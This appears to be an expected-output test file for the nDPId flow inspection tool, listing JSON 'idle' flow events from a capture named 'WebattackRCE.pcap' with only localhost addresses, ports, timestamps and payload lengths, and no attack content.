+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 